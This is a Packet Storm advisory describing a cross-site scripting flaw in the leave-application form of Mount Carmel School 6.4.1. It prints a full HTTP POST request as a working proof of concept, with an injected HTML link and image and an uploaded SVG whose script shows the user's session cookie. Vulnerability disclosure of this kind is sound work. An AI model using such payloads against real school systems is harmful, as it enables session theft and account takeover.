exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

2023 Mount Carmel School 6.4.1 Cross Site Scripting

2023 Mount Carmel School 6.4.1 Cross Site Scripting
Posted Oct 16, 2023
Authored by nu11secur1ty

2023 Mount Carmel School version 6.4.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 1468507ac0b5b0ce74969400a56999cea8841d359cc06c655a563f09bfa94b92

2023 Mount Carmel School 6.4.1 Cross Site Scripting

Change Mirror Download
## Title: 2023-Mount-Carmel-School-6.4.1 XSS-Reflected - User Interaction
## Author: nu11secur1ty
## Date: 10/14/2023
## Vendor: https://smart-school.in/
## Software: https://demo.smart-school.in/site/userlogin#
## Reference: https://portswigger.net/kb/issues/00200300_cross-site-scripting-reflected


## Description:
The user can manipulate the system by injecting an HTML code into the
system without any restriction.
The function apply_leave is not sanitizing correctly. This could allow
the user to inject this
application by using HTML or Java Script with very malicious purposes etc...


STATUS: HIGH- Vulnerability

[+]Exploit:
```HTML
POST /user/apply_leave/add HTTP/1.1
Host: demo.smart-school.in
Cookie: ci_session=495u2fpup87iml75p4us2uuqgqkpsof9
Content-Length: 1492
Sec-Ch-Ua: "Chromium";v="117", "Not;A=Brand";v="8"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundary5wuzslDN9siOCW0K
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132
Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://demo.smart-school.in
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://demo.smart-school.in/user/apply_leave
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="homework_id"


------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="apply_date"

10/14/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="from_date"

09/27/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="to_date"

09/29/2023
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="leave_id"


------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="message"

<a href="https://www.youtube.com/watch?v=yPuC4Cy2ZuI" target="_blank"
rel="noopener nofollow ugc">
<img src="https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/chalga-tochilka.gif"
style="border:1px solid black;max-width:100%;" alt="Photo of Byron
Bay, one of Australia's best beaches!">
------WebKitFormBoundary5wuzslDN9siOCW0K
Content-Disposition: form-data; name="files[]"; filename="kurec.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(document.cookie);
</script>
</svg>

------WebKitFormBoundary5wuzslDN9siOCW0K--

```


## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/smart-school.in/2023/Mount-Carmel-School-6.4.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/10/2023-mount-carmel-school-641-xss.html)

## Time spent:
00:37:00


Login or Register to add favorites

File Archive:

December 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    0 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close